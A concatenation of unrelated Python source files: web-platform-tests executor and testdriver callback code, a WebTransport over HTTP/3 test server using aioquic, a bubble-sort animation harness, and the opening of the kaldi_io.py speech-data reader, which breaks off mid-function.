success, data = self.get_hash(node, viewport_size, dpi)
if success is False:
return {"status": data[0], "message": data[1]}
hashes[i], screenshots[i] = data
urls[i] = node.url
if self.is_pass(hashes, screenshots, urls, relation, fuzzy):
fuzzy = self.get_fuzzy(test, nodes, relation)
if nodes[1].references:
stack.extend(list(((nodes[1], item[0]), item[1]) for item in reversed(nodes[1].references)))
else:
# We passed
return {"status":"PASS", "message": None}
# We failed, so construct a failure message
for i, (node, screenshot) in enumerate(zip(nodes, screenshots)):
if screenshot is None:
success, screenshot = self.retake_screenshot(node, viewport_size, dpi)
if success:
screenshots[i] = screenshot
log_data = [
{"url": nodes[0].url, "screenshot": screenshots[0], "hash": hashes[0]},
relation,
{"url": nodes[1].url, "screenshot": screenshots[1], "hash": hashes[1]},
]
return {"status": "FAIL",
"message": "\n".join(self.message),
"extra": {"reftest_screenshots": log_data}}
def get_fuzzy(self, root_test, test_nodes, relation):
full_key = tuple([item.url for item in test_nodes] + [relation])
ref_only_key = test_nodes[1].url
fuzzy_override = root_test.fuzzy_override
fuzzy = test_nodes[0].fuzzy
sources = [fuzzy_override, fuzzy]
keys = [full_key, ref_only_key, None]
value = None
for source in sources:
for key in keys:
if key in source:
value = source[key]
break
if value:
break
return value
def retake_screenshot(self, node, viewport_size, dpi):
success, data = self.executor.screenshot(node, viewport_size, dpi)
if not success:
return False, data
key = (node.url, viewport_size, dpi)
hash_val, _ = self.screenshot_cache[key]
self.screenshot_cache[key] = hash_val, data
return True, data
class WdspecExecutor(TestExecutor):
convert_result = pytest_result_converter
protocol_cls = None
def __init__(self, browser, server_config, webdriver_binary,
webdriver_args, timeout_multiplier=1, capabilities=None,
debug_info=None, **kwargs):
self.do_delayed_imports()
TestExecutor.__init__(self, browser, server_config,
timeout_multiplier=timeout_multiplier,
debug_info=debug_info)
self.webdriver_binary = webdriver_binary
self.webdriver_args = webdriver_args
self.timeout_multiplier = timeout_multiplier
self.capabilities = capabilities
self.protocol = self.protocol_cls(self, browser)
def is_alive(self):
return self.protocol.is_alive
def on_environment_change(self, new_environment):
pass
def do_test(self, test):
timeout = test.timeout * self.timeout_multiplier + self.extra_timeout
success, data = WdspecRun(self.do_wdspec,
self.protocol.session_config,
test.abs_path,
timeout).run()
if success:
return self.convert_result(test, data)
return (test.result_cls(*data), [])
def do_wdspec(self, session_config, path, timeout):
return pytestrunner.run(path,
self.server_config,
session_config,
timeout=timeout)
def do_delayed_imports(self):
global pytestrunner
from . import pytestrunner
class WdspecRun(object):
def __init__(self, func, session, path, timeout):
self.func = func
self.result = (None, None)
self.session = session
self.path = path
self.timeout = timeout
self.result_flag = threading.Event()
def run(self):
"""Runs function in a thread and interrupts it if it exceeds the
given timeout. Returns (True, (Result, [SubtestResult ...])) in
case of success, or (False, (status, extra information)) in the
event of failure.
"""
executor = threading.Thread(target=self._run)
executor.start()
self.result_flag.wait(self.timeout)
if self.result[1] is None:
self.result = False, ("EXTERNAL-TIMEOUT", None)
return self.result
def _run(self):
try:
self.result = True, self.func(self.session, self.path, self.timeout)
except (socket.timeout, IOError):
self.result = False, ("CRASH", None)
except Exception as e:
message = getattr(e, "message")
if message:
message += "\n"
message += traceback.format_exc(e)
self.result = False, ("INTERNAL-ERROR", message)
finally:
self.result_flag.set()
class ConnectionlessBaseProtocolPart(BaseProtocolPart):
def execute_script(self, script, asynchronous=False):
pass
def set_timeout(self, timeout):
pass
def wait(self):
pass
def set_window(self, handle):
pass
class ConnectionlessProtocol(Protocol):
implements = [ConnectionlessBaseProtocolPart]
def connect(self):
pass
def after_connect(self):
pass
class WebDriverProtocol(Protocol):
server_cls = None
implements = [ConnectionlessBaseProtocolPart]
def __init__(self, executor, browser):
Protocol.__init__(self, executor, browser)
self.webdriver_binary = executor.webdriver_binary
self.webdriver_args = executor.webdriver_args
self.capabilities = self.executor.capabilities
self.session_config = None
self.server = None
def connect(self):
"""Connect to browser via the HTTP server."""
self.server = self.server_cls(
self.logger,
binary=self.webdriver_binary,
args=self.webdriver_args)
self.server.start(block=False)
self.logger.info(
"WebDriver HTTP server listening at %s" % self.server.url)
self.session_config = {"host": self.server.host,
"port": self.server.port,
"capabilities": self.capabilities}
def after_connect(self):
pass
def teardown(self):
if self.server is not None and self.server.is_alive:
self.server.stop()
@property
def is_alive(self):
"""Test that the connection is still alive.
Because the remote communication happens over HTTP we need to
make an explicit request to the remote. It is allowed for
WebDriver spec tests to not have a WebDriver session, since this
may be what is tested.
An HTTP request to an invalid path that results in a 404 is
proof enough to us that the server is alive and kicking.
"""
conn = HTTPConnection(self.server.host, self.server.port)
conn.request("HEAD", self.server.base_path + "invalid")
res = conn.getresponse()
return res.status == 404
class CallbackHandler(object):
"""Handle callbacks from testdriver-using tests.
The default implementation here makes sense for things that are roughly like
WebDriver. Things that are more different to WebDriver may need to create a
fully custom implementation."""
def __init__(self, logger, protocol, test_window):
self.protocol = protocol
self.test_window = test_window
self.logger = logger
self.callbacks = {
"action": self.process_action,
"complete": self.process_complete
}
self.actions = {
"click": ClickAction(self.logger, self.protocol),
"send_keys": SendKeysAction(self.logger, self.protocol),
"action_sequence": ActionSequenceAction(self.logger, self.protocol),
"generate_test_report": GenerateTestReportAction(self.logger, self.protocol),
"set_permission": SetPermissionAction(self.logger, self.protocol),
"add_virtual_authenticator": AddVirtualAuthenticatorAction(self.logger, self.protocol),
"remove_virtual_authenticator": RemoveVirtualAuthenticatorAction(self.logger, self.protocol),
"add_credential": AddCredentialAction(self.logger, self.protocol),
"get_credentials": GetCredentialsAction(self.logger, self.protocol),
"remove_credential": RemoveCredentialAction(self.logger, self.protocol),
"remove_all_credentials": RemoveAllCredentialsAction(self.logger, self.protocol),
"set_user_verified": SetUserVerifiedAction(self.logger, self.protocol),
}
def __call__(self, result):
url, command, payload = result
self.logger.debug("Got async callback: %s" % result[1])
try:
callback = self.callbacks[command]
except KeyError:
raise ValueError("Unknown callback type %r" % result[1])
return callback(url, payload)
def process_complete(self, url, payload):
rv = [strip_server(url)] + payload
return True, rv
def process_action(self, url, payload):
action = payload["action"]
self.logger.debug("Got action: %s" % action)
try:
action_handler = self.actions[action]
except KeyError:
raise ValueError("Unknown action %s" % action)
try:
result = action_handler(payload)
except Exception:
self.logger.warning("Action %s failed" % action)
self.logger.warning(traceback.format_exc())
self._send_message("complete", "error")
raise
else:
self.logger.debug("Action %s completed with result %s" % (action, result))
return_message = {"result": result}
self._send_message("complete", "success", json.dumps(return_message))
return False, None
def _send_message(self, message_type, status, message=None):
self.protocol.testdriver.send_message(message_type, status, message=message)
class ClickAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
selector = payload["selector"]
element = self.protocol.select.element_by_selector(selector)
self.logger.debug("Clicking element: %s" % selector)
self.protocol.click.element(element)
class SendKeysAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
selector = payload["selector"]
keys = payload["keys"]
element = self.protocol.select.element_by_selector(selector)
self.logger.debug("Sending keys to element: %s" % selector)
self.protocol.send_keys.send_keys(element, keys)
class ActionSequenceAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
# TODO: some sort of shallow error checking
actions = payload["actions"]
for actionSequence in actions:
if actionSequence["type"] == "pointer":
for action in actionSequence["actions"]:
if (action["type"] == "pointerMove" and
isinstance(action["origin"], dict)):
action["origin"] = self.get_element(action["origin"]["selector"], action["frame"]["frame"])
self.protocol.action_sequence.send_actions({"actions": actions})
def get_element(self, element_selector, frame):
element = self.protocol.select.element_by_selector(element_selector, frame)
return element
class GenerateTestReportAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
message = payload["message"]
self.logger.debug("Generating test report: %s" % message)
self.protocol.generate_test_report.generate_test_report(message)
class SetPermissionAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
permission_params = payload["permission_params"]
descriptor = permission_params["descriptor"]
name = descriptor["name"]
state = permission_params["state"]
one_realm = permission_params.get("oneRealm", False)
self.logger.debug("Setting permission %s to %s, oneRealm=%s" % (name, state, one_realm))
self.protocol.set_permission.set_permission(name, state, one_realm)
class AddVirtualAuthenticatorAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
self.logger.debug("Adding virtual authenticator")
config = payload["config"]
authenticator_id = self.protocol.virtual_authenticator.add_virtual_authenticator(config)
self.logger.debug("Authenticator created with ID %s" % authenticator_id)
return authenticator_id
class RemoveVirtualAuthenticatorAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
authenticator_id = payload["authenticator_id"]
self.logger.debug("Removing virtual authenticator %s" % authenticator_id)
return self.protocol.virtual_authenticator.remove_virtual_authenticator(authenticator_id)
class AddCredentialAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
authenticator_id = payload["authenticator_id"]
credential = payload["credential"]
self.logger.debug("Adding credential to virtual authenticator %s " % authenticator_id)
return self.protocol.virtual_authenticator.add_credential(authenticator_id, credential)
class GetCredentialsAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
authenticator_id = payload["authenticator_id"]
self.logger.debug("Getting credentials from virtual authenticator %s " % authenticator_id)
return self.protocol.virtual_authenticator.get_credentials(authenticator_id)
class RemoveCredentialAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
authenticator_id = payload["authenticator_id"]
credential_id = payload["credential_id"]
self.logger.debug("Removing credential %s from authenticator %s" % (credential_id, authenticator_id))
return self.protocol.virtual_authenticator.remove_credential(authenticator_id, credential_id)
class RemoveAllCredentialsAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
authenticator_id = payload["authenticator_id"]
self.logger.debug("Removing all credentials from authenticator %s" % authenticator_id)
return self.protocol.virtual_authenticator.remove_all_credentials(authenticator_id)
class SetUserVerifiedAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
authenticator_id = payload["authenticator_id"]
uv = payload["uv"]
self.logger.debug(
"Setting user verified flag on authenticator %s to %s" % (authenticator_id, uv["isUserVerified"]))
return self.protocol.virtual_authenticator.set_user_verified(authenticator_id, uv)
|
webtransport_h3_server.py
|
import asyncio
import logging
import os
import ssl
import threading
import traceback
from urllib.parse import urlparse
from typing import Any, Dict, List, Optional, Tuple
# TODO(bashi): Remove import check suppressions once aioquic dependency is resolved.
from aioquic.buffer import Buffer # type: ignore
from aioquic.asyncio import QuicConnectionProtocol, serve # type: ignore
from aioquic.asyncio.client import connect # type: ignore
from aioquic.h3.connection import H3_ALPN, FrameType, H3Connection, ProtocolError, Setting # type: ignore
from aioquic.h3.events import H3Event, HeadersReceived, WebTransportStreamDataReceived, DatagramReceived, DataReceived # type: ignore
from aioquic.quic.configuration import QuicConfiguration # type: ignore
from aioquic.quic.connection import stream_is_unidirectional # type: ignore
from aioquic.quic.events import QuicEvent, ProtocolNegotiated, ConnectionTerminated, StreamReset # type: ignore
from aioquic.tls import SessionTicket # type: ignore
from tools.wptserve.wptserve import stash # type: ignore
from .capsule import H3Capsule, H3CapsuleDecoder, CapsuleType
"""
A WebTransport over HTTP/3 server for testing.
The server interprets the underlying protocols (WebTransport, HTTP/3 and QUIC)
and passes events to a particular webtransport handler. From the standpoint of
test authors, a webtransport handler is a Python script which contains some
callback functions. See handler.py for available callbacks.
"""
SERVER_NAME = 'webtransport-h3-server'
_logger: logging.Logger = logging.getLogger(__name__)
_doc_root: str = ""
class H3ConnectionWithDatagram04(H3Connection):
"""
A H3Connection subclass, to make it work with the latest
HTTP Datagram protocol.
"""
H3_DATAGRAM_04 = 0xffd277
def __init__(self, *args: Any, **kwargs: Any) -> None:
super().__init__(*args, **kwargs)
self._supports_h3_datagram_04 = False
def _validate_settings(self, settings: Dict[int, int]) -> None:
H3_DATAGRAM_04 = H3ConnectionWithDatagram04.H3_DATAGRAM_04
if H3_DATAGRAM_04 in settings and settings[H3_DATAGRAM_04] == 1:
settings[Setting.H3_DATAGRAM] = 1
self._supports_h3_datagram_04 = True
return super()._validate_settings(settings)
def _get_local_settings(self) -> Dict[int, int]:
H3_DATAGRAM_04 = H3ConnectionWithDatagram04.H3_DATAGRAM_04
settings = super()._get_local_settings()
settings[H3_DATAGRAM_04] = 1
return settings
@property
def supports_h3_datagram_04(self) -> bool:
"""
True if the client supports the latest HTTP Datagram protocol.
"""
return self._supports_h3_datagram_04
class WebTransportH3Protocol(QuicConnectionProtocol):
def __init__(self, *args: Any, **kwargs: Any) -> None:
super().__init__(*args, **kwargs)
self._handler: Optional[Any] = None
self._http: Optional[H3ConnectionWithDatagram04] = None
self._session_stream_id: Optional[int] = None
self._close_info: Optional[Tuple[int, bytes]] = None
self._capsule_decoder_for_session_stream: H3CapsuleDecoder =\
H3CapsuleDecoder()
self._allow_calling_session_closed = True
self._allow_datagrams = False
def quic_event_received(self, event: QuicEvent) -> None:
if isinstance(event, ProtocolNegotiated):
self._http = H3ConnectionWithDatagram04(
self._quic, enable_webtransport=True)
if not self._http.supports_h3_datagram_04:
self._allow_datagrams = True
if self._http is not None:
for http_event in self._http.handle_event(event):
self._h3_event_received(http_event)
if isinstance(event, ConnectionTerminated):
self._call_session_closed(close_info=None, abruptly=True)
if isinstance(event, StreamReset):
if self._handler:
self._handler.stream_reset(event.stream_id, event.error_code)
def _h3_event_received(self, event: H3Event) -> None:
if isinstance(event, HeadersReceived):
# Convert from List[Tuple[bytes, bytes]] to Dict[bytes, bytes].
# Only the last header will be kept when there are duplicate
# headers.
headers = {}
for header, value in event.headers:
headers[header] = value
method = headers.get(b":method")
protocol = headers.get(b":protocol")
if method == b"CONNECT" and protocol == b"webtransport":
self._session_stream_id = event.stream_id
self._handshake_webtransport(event, headers)
else:
self._send_error_response(event.stream_id, 400)
if isinstance(event, DataReceived) and\
self._session_stream_id == event.stream_id:
if self._http and not self._http.supports_h3_datagram_04 and\
len(event.data) > 0:
raise ProtocolError('Unexpected data on the session stream')
self._receive_data_on_session_stream(
event.data, event.stream_ended)
elif self._handler is not None:
if isinstance(event, WebTransportStreamDataReceived):
self._handler.stream_data_received(
stream_id=event.stream_id,
data=event.data,
stream_ended=event.stream_ended)
elif isinstance(event, DatagramReceived):
if self._allow_datagrams:
self._handler.datagram_received(data=event.data)
def _receive_data_on_session_stream(self, data: bytes, fin: bool) -> None:
self._capsule_decoder_for_session_stream.append(data)
if fin:
self._capsule_decoder_for_session_stream.final()
for capsule in self._capsule_decoder_for_session_stream:
if capsule.type in {CapsuleType.DATAGRAM,
CapsuleType.REGISTER_DATAGRAM_CONTEXT,
CapsuleType.CLOSE_DATAGRAM_CONTEXT}:
raise ProtocolError(
"Unimplemented capsule type: {}".format(capsule.type))
if capsule.type in {CapsuleType.REGISTER_DATAGRAM_NO_CONTEXT,
CapsuleType.CLOSE_WEBTRANSPORT_SESSION}:
# We'll handle this case below.
pass
else:
# We should ignore unknown capsules.
continue
if self._close_info is not None:
raise ProtocolError((
"Receiving a capsule with type = {} after receiving " +
"CLOSE_WEBTRANSPORT_SESSION").format(capsule.type))
if capsule.type == CapsuleType.REGISTER_DATAGRAM_NO_CONTEXT:
buffer = Buffer(data=capsule.data)
format_type = buffer.pull_uint_var()
# https://ietf-wg-webtrans.github.io/draft-ietf-webtrans-http3/draft-ietf-webtrans-http3.html#name-datagram-format-type
WEBTRANPORT_FORMAT_TYPE = 0xff7c00
if format_type != WEBTRANPORT_FORMAT_TYPE:
raise ProtocolError(
"Unexpected datagram format type: {}".format(
format_type))
self._allow_datagrams = True
elif capsule.type == CapsuleType.CLOSE_WEBTRANSPORT_SESSION:
buffer = Buffer(data=capsule.data)
code = buffer.pull_uint32()
# 4 bytes for the uint32.
reason = buffer.pull_bytes(len(capsule.data) - 4)
# TODO(yutakahirano): Make sure `reason` is a UTF-8 text.
self._close_info = (code, reason)
if fin:
self._call_session_closed(self._close_info, abruptly=False)
def _send_error_response(self, stream_id: int, status_code: int) -> None:
assert self._http is not None
headers = [(b"server", SERVER_NAME.encode()),
(b":status", str(status_code).encode())]
self._http.send_headers(stream_id=stream_id,
headers=headers,
end_stream=True)
def _handshake_webtransport(self, event: HeadersReceived,
request_headers: Dict[bytes, bytes]) -> None:
assert self._http is not None
path = request_headers.get(b":path")
if path is None:
# `:path` must be provided.
self._send_error_response(event.stream_id, 400)
return
# Create a handler using `:path`.
try:
self._handler = self._create_event_handler(
session_id=event.stream_id,
path=path,
request_headers=event.headers)
except IOError:
self._send_error_response(event.stream_id, 404)
return
response_headers = [
(b"server", SERVER_NAME.encode()),
]
self._handler.connect_received(response_headers=response_headers)
status_code = None
for name, value in response_headers:
if name == b":status":
status_code = value
break
if not status_code:
response_headers.append((b":status", b"200"))
self._http.send_headers(stream_id=event.stream_id,
headers=response_headers)
if status_code is None or status_code == b"200":
self._handler.session_established()
def _create_event_handler(self, session_id: int, path: bytes,
request_headers: List[Tuple[bytes, bytes]]) -> Any:
parsed = urlparse(path.decode())
file_path = os.path.join(_doc_root, parsed.path.lstrip("/"))
callbacks = {"__file__": file_path}
with open(file_path) as f:
exec(compile(f.read(), path, "exec"), callbacks)
session = WebTransportSession(self, session_id, request_headers)
return WebTransportEventHandler(session, callbacks)
def _call_session_closed(
self, close_info: Optional[Tuple[int, bytes]],
abruptly: bool) -> None:
allow_calling_session_closed = self._allow_calling_session_closed
self._allow_calling_session_closed = False
if self._handler and allow_calling_session_closed:
self._handler.session_closed(close_info, abruptly)
class WebTransportSession:
"""
A WebTransport session.
"""
def __init__(self, protocol: WebTransportH3Protocol, session_id: int,
request_headers: List[Tuple[bytes, bytes]]) -> None:
self.session_id = session_id
self.request_headers = request_headers
self._protocol: WebTransportH3Protocol = protocol
self._http: H3Connection = protocol._http
# Use the a shared default path for all handlers so that different
# WebTransport sessions can access the same store easily.
self._stash_path = '/webtransport/handlers'
self._stash: Optional[stash.Stash] = None
self._dict_for_handlers: Dict[str, Any] = {}
@property
def stash(self) -> stash.Stash:
"""A Stash object for storing cross-session state."""
if self._stash is None:
address, authkey = stash.load_env_config()
self._stash = stash.Stash(self._stash_path, address, authkey)
return self._stash
@property
def dict_for_handlers(self) -> Dict[str, Any]:
"""A dictionary that handlers can attach arbitrary data."""
return self._dict_for_handlers
def stream_is_unidirectional(self, stream_id: int) -> bool:
"""Return True if the stream is unidirectional."""
return stream_is_unidirectional(stream_id)
def close(self, close_info: Optional[Tuple[int, bytes]]) -> None:
"""
Close the session.
:param close_info The close information to send.
"""
self._protocol._allow_calling_session_closed = False
assert self._protocol._session_stream_id is not None
session_stream_id = self._protocol._session_stream_id
if close_info is not None:
code = close_info[0]
reason = close_info[1]
buffer = Buffer(capacity=len(reason) + 4)
buffer.push_uint32(code)
buffer.push_bytes(reason)
capsule =\
H3Capsule(CapsuleType.CLOSE_WEBTRANSPORT_SESSION, buffer.data)
self._http.send_data(session_stream_id, capsule.encode(), end_stream=False)
self._http.send_data(session_stream_id, b'', end_stream=True)
# TODO(yutakahirano): Reset all other streams.
# TODO(yutakahirano): Reject future stream open requests
# We need to wait for the stream data to arrive at the client, and then
# we need to close the connection. At this moment we're relying on the
# client's behavior.
# TODO(yutakahirano): Implement the above.
def create_unidirectional_stream(self) -> int:
"""
Create a unidirectional WebTransport stream and return the stream ID.
"""
return self._http.create_webtransport_stream(
session_id=self.session_id, is_unidirectional=True)
def create_bidirectional_stream(self) -> int:
"""
Create a bidirectional WebTransport stream and return the stream ID.
"""
stream_id = self._http.create_webtransport_stream(
session_id=self.session_id, is_unidirectional=False)
# TODO(bashi): Remove this workaround when aioquic supports receiving
# data on server-initiated bidirectional streams.
stream = self._http._get_or_create_stream(stream_id)
assert stream.frame_type is None
assert stream.session_id is None
stream.frame_type = FrameType.WEBTRANSPORT_STREAM
stream.session_id = self.session_id
return stream_id
def send_stream_data(self,
stream_id: int,
data: bytes,
end_stream: bool = False) -> None:
"""
Send data on the specific stream.
:param stream_id: The stream ID on which to send the data.
:param data: The data to send.
:param end_stream: If set to True, the stream will be closed.
"""
self._http._quic.send_stream_data(stream_id=stream_id,
data=data,
end_stream=end_stream)
def send_datagram(self, data: bytes) -> None:
"""
Send data using a datagram frame.
:param data: The data to send.
"""
if not self._protocol._allow_datagrams:
_logger.warn(
"Sending a datagram while that's now allowed - discarding it")
return
flow_id = self.session_id
if self._http.supports_h3_datagram_04:
# The REGISTER_DATAGRAM_NO_CONTEXT capsule was on the session
# stream, so we must have the ID of the stream.
assert self._protocol._session_stream_id is not None
# TODO(yutakahirano): Make sure if this is the correct logic.
# Chrome always use 0 for the initial stream and the initial flow
# ID, we cannot check the correctness with it.
flow_id = self._protocol._session_stream_id // 4
self._http.send_datagram(flow_id=flow_id, data=data)
def stop_stream(self, stream_id: int, code: int) -> None:
"""
Send a STOP_SENDING frame to the given stream.
:param code: the reason of the error.
"""
self._http._quic.stop_stream(stream_id, code)
def reset_stream(self, stream_id: int, code: int) -> None:
"""
Send a RESET_STREAM frame to the given stream.
:param code: the reason of the error.
"""
self._http._quic.reset_stream(stream_id, code)
class WebTransportEventHandler:
def __init__(self, session: WebTransportSession,
callbacks: Dict[str, Any]) -> None:
self._session = session
self._callbacks = callbacks
def _run_callback(self, callback_name: str,
*args: Any, **kwargs: Any) -> None:
if callback_name not in self._callbacks:
return
try:
self._callbacks[callback_name](*args, **kwargs)
except Exception as e:
_logger.warn(str(e))
traceback.print_exc()
def connect_received(self, response_headers: List[Tuple[bytes,
bytes]]) -> None:
self._run_callback("connect_received", self._session.request_headers,
response_headers)
def session_established(self) -> None:
self._run_callback("session_established", self._session)
def stream_data_received(self, stream_id: int, data: bytes,
stream_ended: bool) -> None:
self._run_callback("stream_data_received", self._session, stream_id,
data, stream_ended)
def datagram_received(self, data: bytes) -> None:
self._run_callback("datagram_received", self._session, data)
def session_closed(
self,
close_info: Optional[Tuple[int, bytes]],
abruptly: bool) -> None:
self._run_callback(
"session_closed", self._session, close_info, abruptly=abruptly)
def stream_reset(self, stream_id: int, error_code: int) -> None:
self._run_callback(
"stream_reset", self._session, stream_id, error_code)
class SessionTicketStore:
"""
Simple in-memory store for session tickets.
"""
def __init__(self) -> None:
self.tickets: Dict[bytes, SessionTicket] = {}
def add(self, ticket: SessionTicket) -> None:
self.tickets[ticket.ticket] = ticket
def pop(self, label: bytes) -> Optional[SessionTicket]:
return self.tickets.pop(label, None)
class WebTransportH3Server:
"""
A WebTransport over HTTP/3 for testing.
:param host: Host from which to serve.
:param port: Port from which to serve.
:param doc_root: Document root for serving handlers.
:param cert_path: Path to certificate file to use.
:param key_path: Path to key file to use.
:param logger: a Logger object for this server.
"""
def __init__(self, host: str, port: int, doc_root: str, cert_path: str,
key_path: str, logger: Optional[logging.Logger]) -> None:
self.host = host
self.port = port
self.doc_root = doc_root
self.cert_path = cert_path
self.key_path = key_path
self.started = False
global _doc_root
_doc_root = self.doc_root
global _logger
if logger is not None:
_logger = logger
def start(self) -> None:
"""Start the server."""
self.server_thread = threading.Thread(
target=self._start_on_server_thread, daemon=True)
self.server_thread.start()
self.started = True
def _start_on_server_thread(self) -> None:
configuration = QuicConfiguration(
alpn_protocols=H3_ALPN,
is_client=False,
max_datagram_frame_size=65536,
)
_logger.info("Starting WebTransport over HTTP/3 server on %s:%s",
self.host, self.port)
configuration.load_cert_chain(self.cert_path, self.key_path)
ticket_store = SessionTicketStore()
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
self.loop.run_until_complete(
serve(
self.host,
self.port,
configuration=configuration,
create_protocol=WebTransportH3Protocol,
session_ticket_fetcher=ticket_store.pop,
session_ticket_handler=ticket_store.add,
))
self.loop.run_forever()
def stop(self) -> None:
"""Stop the server."""
if self.started:
asyncio.run_coroutine_threadsafe(self._stop_on_server_thread(),
self.loop)
self.server_thread.join()
_logger.info("Stopped WebTransport over HTTP/3 server on %s:%s",
self.host, self.port)
self.started = False
async def _stop_on_server_thread(self) -> None:
self.loop.stop()
def server_is_running(host: str, port: int, timeout: float) -> bool:
"""
Check the WebTransport over HTTP/3 server is running at the given `host` and
`port`.
"""
loop = asyncio.get_event_loop()
return loop.run_until_complete(_connect_server_with_timeout(host, port, timeout))
async def _connect_server_with_timeout(host: str, port: int, timeout: float) -> bool:
try:
await asyncio.wait_for(_connect_to_server(host, port), timeout=timeout)
except asyncio.TimeoutError:
_logger.warning("Failed to connect WebTransport over HTTP/3 server")
return False
return True
async def _connect_to_server(host: str, port: int) -> None:
configuration = QuicConfiguration(
alpn_protocols=H3_ALPN,
is_client=True,
verify_mode=ssl.CERT_NONE,
)
async with connect(host, port, configuration=configuration) as protocol:
await protocol.ping()
|
harness.py
|
#!/usr/bin/env python
#
# Copyright (c) 2015, Jason L. Wright <jason@thought.net>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# implementation of visualized bubble sort
import matplotlib
matplotlib.use('TKAgg')
import matplotlib.pyplot as plt
import matplotlib.animation as animation
import threading
import Queue
import copy
import random
class SortHarness:
def __init__(self, sortfun, N):
self.sortfun = sortfun
self.theArray = range(N)
random.shuffle(self.theArray)
self.fig = plt.figure()
self.ax = plt.axes(xlim=(0, len(self.theArray)),
ylim=(0, len(self.theArray)))
self.line, = self.ax.plot([], [], 'ro')
self.resQueue = Queue.Queue(10)
self.aargs = {
'queue': self.resQueue,
'done': False
}
def plot_init(self):
self.line.set_data([], [])
return self.line,
def plot_update(self, num, aargs):
if aargs['done']:
return
q = aargs['queue']
a = q.get()
if a is None:
aargs['done'] = True
return
self.line.set_data(range(0, len(a)), a)
q.task_done()
return self.line,
@staticmethod
def sort_thread(self):
self.sortfun(self.resQueue, self.theArray)
self.resQueue.put(None)
def go(self):
threads = []
t = threading.Thread(target=self.sort_thread, args=(self,))
t.daemon = True
threads.append(t)
[t.start() for t in threads]
ani = animation.FuncAnimation(self.fig, self.plot_update,
fargs=(self.aargs,),
init_func=self.plot_init, blit=True,
interval=10)
plt.show()
if __name__ == "__main__":
parser = argparser.ArgumentParser()
parser.add_argument('--len', type=int, help="length of array",
required=False, default=100)
args = parser.parse_args()
def do_bubble(q, a):
for j in range(len(a) - 1, -1, -1):
swapped = False
for i in range(0, j):
if a[i] <= a[i + 1]:
continue
a[i], a[i + 1] = a[i + 1], a[i]
q.put(copy.deepcopy(a))
swapped = True
if not swapped:
return
SortHarness(do_bubble, args.len).go()
|
kaldi_io.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2014-2019 Brno University of Technology (author: Karel Vesely)
# Licensed under the Apache License, Version 2.0 (the "License")
from __future__ import print_function
from __future__ import division
import numpy as np
import sys, os, re, gzip, struct
#################################################
# Adding kaldi tools to shell path,
# Select kaldi,
if not 'KALDI_ROOT' in os.environ:
# Default! To change run python with 'export KALDI_ROOT=/some_dir python'
os.environ['KALDI_ROOT']='/mnt/matylda5/iveselyk/Tools/kaldi-trunk'
# Add kaldi tools to path,
os.environ['PATH'] = os.popen('echo $KALDI_ROOT/src/bin:$KALDI_ROOT/tools/openfst/bin:$KALDI_ROOT/src/fstbin/:$KALDI_ROOT/src/gmmbin/:$KALDI_ROOT/src/featbin/:$KALDI_ROOT/src/lm/:$KALDI_ROOT/src/sgmmbin/:$KALDI_ROOT/src/sgmm2bin/:$KALDI_ROOT/src/fgmmbin/:$KALDI_ROOT/src/latbin/:$KALDI_ROOT/src/nnetbin:$KALDI_ROOT/src/nnet2bin:$KALDI_ROOT/src/nnet3bin:$KALDI_ROOT/src/online2bin/:$KALDI_ROOT/src/ivectorbin/:$KALDI_ROOT/src/lmbin/').readline().strip() + ':' + os.environ['PATH']
#################################################
# Define all custom exceptions,
class UnsupportedDataType(Exception): pass
class UnknownVectorHeader(Exception): pass
class UnknownMatrixHeader(Exception): pass
class BadSampleSize(Exception): pass
class BadInputFormat(Exception): pass
class SubprocessFailed(Exception): pass
#################################################
# Data-type independent helper functions,
def open_or_fd(file, mode='rb'):
""" fd = open_or_fd(file)
Open file, gzipped file, pipe, or forward the file-descriptor.
Eventually seeks in the 'file' argument contains ':offset' suffix.
"""
offset = None
try:
# strip 'ark:' prefix from r{x,w}filename (optional),
